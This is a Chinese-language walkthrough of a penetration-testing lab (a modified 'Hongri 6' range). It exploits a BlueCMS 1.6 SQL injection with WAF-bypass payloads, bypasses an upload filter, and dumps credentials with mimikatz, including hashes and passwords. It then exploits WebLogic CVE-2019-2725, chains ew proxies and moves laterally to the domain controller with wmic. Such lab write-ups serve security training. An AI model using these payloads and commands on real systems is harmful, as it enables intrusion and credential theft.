靶机环境-魔改的红日6,修改了bluecms源码;
外网Web:192.168.140.131/192.168.111.128
内网Web:192.168.111.80/10.10.10.80
DC:10.10.10.10
首先来到外网web:
可以看到开放了80访问看看
可以看到是bluecms 1.6。这个cms很多漏洞,网上下载一套看看。
全文搜索下$_GET
来到ad_js.php
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';if(empty($ad_id)){ echo 'Error!'; exit();}$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);if($ad['time_set'] == 0){ $ad_content = $ad['content'];}else{ if($ad['end_time'] < time()) { $ad_content = $ad['exp_content']; } else { $ad_content = $ad['content']; }}
可以看到如果ad_id不为空就删除两边的空白符号,否则输出Error,然后就会执行getone方法,跟踪下getone。
function getone($sql, $type=MYSQL_ASSOC){ $query = $this->query($sql,$this->linkid); $row = mysql_fetch_array($query, $type); return $row; }
可以看到没有做任何过滤,直接带入了执行了sql语句。
http://192.168.140.131/ad_js.php?ad_id=1 and 1=1
可以看到存在waf。
fuzz下加上/"%!* 来干扰。 绕过order by
ad_js.php?ad_id=1/%//order////by////8
http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8
ad_js.php?ad_id=1/%//order////by////7
<!--document.write("");-->
绕过union select
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
全部被拦截,加上/!50001/再来跑
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7
返回包:
HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 10:29:14 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 33Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("7");-->
获取当前表:正常语句:
union select 1,2,3,4,5,6,group_concat(table_name), from information_schema.tables where table_schema=database()
套用上面的被拦截,逐条测试哪里被拦截了
发现只要不存在database()就不会被拦截
同理fuzz括号里面就行 bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/
返回包:
HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 10:37:08 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 401Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");-->
可以看到存在blue_admin表,查看该表存在的字段
正常语句:
union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'
单引号过滤hex编码下
bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
返回包:
HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:03:52 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 108Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");-->
存在admin_name,pwd
获取账密正常语句套同样的过滤语句:blue_admin:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
返回包:
HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:08:14 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 37Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("admin");-->
pwd:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin
返回包:
HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:09:17 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 64Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("cc03e747a6afbbcbf8be7668acfebee5");-->
获得账密:admin/test123
这里尝试了文件包含发现不行,发现robots.txt下存在test目录的upload.html文件
直接被拦截了
这里我们可以修改
Content-Disposition: form-data; name="file"; filename="t.php"
为
Content-Disposition: form-data; name="file"; filename=; filename="t.php"
来绕过
可以看到权限还是挺高的。存在111段
上传ew到web靶机
执行
ew.exe -s ssocksd -l 1266
添加用户上去,mimikatz抓密码
aspnet 161cff084477fe596a5db81874498a24(1qaz@WSX)itsec 852a844adfce18f66009b4f14e0a98de(test123..)Administrator 852a844adfce18f66009b4f14e0a98de(test123..)
c段发现存在80
存在administrator用户明文看看能不能直接ipc
密码不对。开放了80和7001
80没啥东西7001为weblogic
存在CVE-2019-2725
拿下内网weblogic
可以看到存在域de1ay.com,拿到了本地管理员权限。
存在10.10.10段
抓下密码:
* Username : de1ay* Domain : WEB* NTLM : cb5141dcdaa451b0972f3144fda5b3cd* SHA1 : c25aadf268b15742f54e1ca78d54b1da417d5f8d* Password : 1qaz@WSX1qaz@WSXUser : AdministratorHash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0(可能没启用)
设置多层代理 attack ip:192.168.140.1 web:192.168.140.131/192.168.111.128 weblogic:192.168.111.80/10.10.10.80
上传ew到weblogic机器上执行监听本地8888端口:
ew.exe -s ssocksd -l 8888
在攻击机器上执行,把本地端口1080跟web的9999端口绑定:
ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999
在web机器上将本地的9999跟weblogic的8888绑定:
ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888
发现存在10机器。
用现有的密码加上域用户尝试爆破
user:
de1ay\administratorde1ay\de1ay
pass:
1qaz@WSXtest123..1qaz@WSX1qaz@WSX
1.runas获取域用户cmd:
runas /user:de1ay\administrator cmd
wmi横向移动:
wmic /node:10.10.10.10 /user:de1ay\administrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:\1.txt"